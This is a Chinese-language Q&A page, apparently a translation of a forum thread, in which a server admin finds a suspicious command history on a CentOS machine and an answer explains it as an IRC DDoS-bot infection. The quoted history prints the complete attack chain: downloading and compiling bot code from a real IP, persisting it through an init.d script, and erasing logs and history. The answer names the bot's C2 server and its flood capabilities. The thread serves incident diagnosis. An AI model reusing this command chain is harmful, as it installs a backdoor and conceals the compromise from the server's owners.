参见英文答案 >
How do I deal with a compromised server?13个
我们今天使用Putty远程登录我们的CentOS服务器,在使用向上箭头浏览之前的命令时,偶然发现了以下情况:
我们今天使用Putty远程登录我们的CentOS服务器,在使用向上箭头浏览之前的命令时,偶然发现了以下情况:
unset HISTFILE mkdir /usr/lib/tmp cd /usr/lib/tmp wget http://188.72.217.17/mzb.c -o /dev/null wget http://188.72.217.17/windef.h -o /dev/null gcc mzb.c -o /bin/bot -lpthread rm -rf mzb.c rm -rf windef.h wget http://188.72.217.17/botsupport.sh -o /dev/null chmod +x botsupport.sh mv botsupport.sh /etc/init.d/httpd2 cat /etc/init.d/network > /etc/init.d/network.bp echo \#\!/bin/sh > /etc/init.d/network echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network cat /etc/init.d/network.bp >> /etc/init.d/network cat /dev/null > /var/log/lastlog history -c nohup /etc/init.d/httpd2 &
(为了清晰起见,用&换成了换行符)
我永远不会运行这些命令,永远!这是怎么发生的,我的服务器被黑了吗?我立即改变了我的root密码,但是希望有人可以对这里发生的事情做出正面或反面.
我看到源代码中对ddos机器人的引用,我和我的同事都非常关注!
提前致谢!
是的,你被黑了.黑客安装了一个IRC后门,你正在连接到这个IRC服务器:
const int port = 1254; const char channel[] = "#test"; const char password[]= "pass"; const char server[] = "heathen.cc";
bot herder可以在您的服务器上执行任何命令.我建议关闭服务器并立即重新安装.机器人有一些DDoS攻击功能,DNS泛洪,同步洪水和ICMP泛滥.它也适用于非常酷的窗户.有一个非常古老的传播模块来感染myDoom.这看起来像一些旧的恶意软件.
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。